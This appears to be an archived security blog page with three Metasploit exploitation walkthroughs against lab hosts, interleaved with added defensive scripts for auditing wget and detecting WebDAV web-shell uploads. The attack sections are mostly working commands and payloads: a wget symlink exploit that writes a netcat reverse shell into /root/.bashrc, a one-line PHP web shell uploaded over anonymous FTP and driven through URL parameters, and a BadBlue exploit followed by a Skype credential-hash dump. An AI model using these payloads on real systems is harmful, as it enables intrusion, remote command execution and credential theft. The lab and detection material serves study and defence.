Archive | Metasploit
Video

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m ftp://192.168.2.104:2121/
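Defender-side check for the vulnerability demonstrated above. CVE-2014-4877 was fixed in wget 1.16, and the documented workaround for older builds was to set retr-symlinks = on in /etc/wgetrc or ~/.wgetrc, so that a recursive FTP mirror retrieves symlink targets as files rather than recreating the symlinks locally. The script below is an added example, not part of the original post or of the Metasploit module; the function names and the sample wgetrc it writes are my own.

```shell
#!/bin/sh
# Added example: audit a host for the CVE-2014-4877 mitigation.
# Two independent checks are offered:
#   1. wget_version_fixed  VERSION   - is the installed wget >= 1.16?
#   2. wgetrc_retr_symlinks_on FILE   - does a wgetrc enable retr-symlinks?
# Function names are my own; the sample wgetrc at the bottom is constructed.

# wget_version_fixed VERSION  (e.g. "1.15", "1.16.1", "2.0")
# Returns 0 when MAJOR.MINOR is at least 1.16, 1 otherwise or on garbage.
wget_version_fixed() {
  major=${1%%.*}
  rest=${1#*.}
  minor=${rest%%.*}
  case "$major$minor" in *[!0-9]*|"") return 1 ;; esac
  [ "$major" -gt 1 ] || { [ "$major" -eq 1 ] && [ "$minor" -ge 16 ]; }
}

# wgetrc_retr_symlinks_on FILE
# Returns 0 if FILE has an uncommented "retr-symlinks = on" line.
# wget's parser also accepts retr_symlinks / retrsymlinks and the
# boolean spellings yes and 1, so those are matched as well.
wgetrc_retr_symlinks_on() {
  [ -r "$1" ] || return 1
  grep -Eiq '^[[:space:]]*retr[-_]?symlinks[[:space:]]*=[[:space:]]*(on|yes|1)[[:space:]]*$' "$1"
}

# check_host_wget
# Reports the local wget version and whether either standard wgetrc
# carries the workaround.  Informational only; prints a verdict line.
check_host_wget() {
  if ! command -v wget >/dev/null 2>&1; then
    echo "wget: not installed"
    return 0
  fi
  ver=$(wget --version 2>/dev/null | head -n 1 | awk '{print $3}')
  if wget_version_fixed "$ver"; then
    echo "wget $ver: fixed release (>= 1.16)"
    return 0
  fi
  for rc in /etc/wgetrc "$HOME/.wgetrc"; do
    if wgetrc_retr_symlinks_on "$rc"; then
      echo "wget $ver: vulnerable release, but $rc sets retr-symlinks=on"
      return 0
    fi
  done
  echo "wget $ver: VULNERABLE - no retr-symlinks workaround found"
  return 1
}

# Stand-alone demo on a constructed wgetrc (not a real host file).
demo_rc=$(mktemp)
printf '# constructed sample wgetrc\nretr-symlinks = on\n' > "$demo_rc"
wgetrc_retr_symlinks_on "$demo_rc" && echo "sample wgetrc: workaround present"
rm -f "$demo_rc"
check_host_wget || true
```

The version check compares only MAJOR.MINOR, which is enough for the 1.16 boundary; distributions that backported the fix to an older version string will show as vulnerable here and need the wgetrc check or the vendor's changelog instead.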
Video

bWAPP: Abusing FTP and WebDav – Uploading Shell

The video shows how to exploit bWAPP through FTP and WebDAV using the Metasploit Framework. Here are the steps:

  • First, run Nmap and carefully verify all exposed services
  • Run the Metasploit Framework, check that WebDAV is enabled and exploit it
  • Connect to FTP, log in and upload your backdoor
  • Access your backdoor through the web browser and get a reverse shell
# msfconsole
msf > search ftp_login
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit

msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:

ftp> ls
ftp> put backdoor.php

backdoor.php code:

<?php

print_r(($_GET['x']) ? exec($_GET['x']) : '');

?>

Address Bar:

192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd
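The upload-then-execute sequence above leaves two distinct traces in the web server's access log: a write of a PHP file into the WebDAV share (when the upload goes over WebDAV rather than FTP) and subsequent GET requests to that file with a query string carrying the command. The script below is an added example of detection logic for that pattern, not code from the original post or from bWAPP; it runs over constructed Apache combined-format log lines, and the function names are my own. An FTP upload, as shown in the video, would only appear in the FTP daemon's transfer log, so that side is out of scope here.

```shell
#!/bin/sh
# Added example: flag WebDAV PHP uploads and web-shell style requests in an
# Apache combined-format access log.  In that format $6 is the quoted HTTP
# method and $7 the request path (query string included).
# Function names are my own; the log lines below are constructed samples.

# detect_webdav_php_abuse LOGFILE
# Prints one tagged line per hit.  Returns 0 if anything matched, 1 if not.
detect_webdav_php_abuse() {
  awk '
    {
      method = $6; sub(/^"/, "", method)
      path   = $7
    }
    # Rule 1: a PHP-family file written with PUT.  (COPY/MOVE place the
    # target in the Destination header, not the path, so they are not
    # covered by a path check and would need a LogFormat that records it.)
    method == "PUT" && path ~ /\.(php|phtml|phar|php[3-7])([?#\/]|$)/ {
      print "UPLOAD  " $1 " " method " " path; hits++; next
    }
    # Rule 2: a PHP file under the WebDAV share requested with a query
    # string, the execution pattern of backdoor.php?x=<command>.
    method == "GET" && path ~ /^\/webdav\/.*\.php\?/ {
      print "EXECUTE " $1 " " method " " path; hits++
    }
    END { exit (hits > 0) ? 0 : 1 }
  ' "$1"
}

# write_sample_log FILE
# Writes five constructed log lines: two are malicious, three are benign.
write_sample_log() {
  cat > "$1" <<'EOF'
192.168.25.1 - - [10/Oct/2014:13:55:01 +0000] "GET /webdav/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.25.1 - - [10/Oct/2014:13:55:36 +0000] "PUT /webdav/backdoor.php HTTP/1.1" 201 0 "-" "cadaver/0.23"
192.168.25.1 - - [10/Oct/2014:13:56:02 +0000] "GET /webdav/backdoor.php?x=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.25.1 - - [10/Oct/2014:13:56:10 +0000] "GET /webdav/notes.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.25.1 - - [10/Oct/2014:13:57:00 +0000] "PUT /webdav/report.pdf HTTP/1.1" 201 0 "-" "cadaver/0.23"
EOF
}

# Stand-alone demo: expect two hits, the PUT of backdoor.php and the
# GET of backdoor.php?x=ls.
demo_log=$(mktemp)
write_sample_log "$demo_log"
detect_webdav_php_abuse "$demo_log"
rm -f "$demo_log"
```

Rule 1 fires on the upload even when the attacker never calls the file, which is the cheaper signal to alert on; rule 2 will also catch a shell that arrived by FTP, because execution still goes through the web server. Tightening the path prefix in rule 2 to whatever directories are actually writable on your server keeps false positives from legitimate PHP applications down.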

Video

Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using the Metasploit Framework and BadBlue httpd 2.7. Here are the steps:

  • Exploit the Windows 8 machine through BadBlue httpd 2.7
  • Use the Skype post-exploitation module to dump the hashes
  • Crack the MD5 hashes, since the module does not return plaintext passwords
nmap -sS -sV 192.168.25.129

msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST 192.168.25.129
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit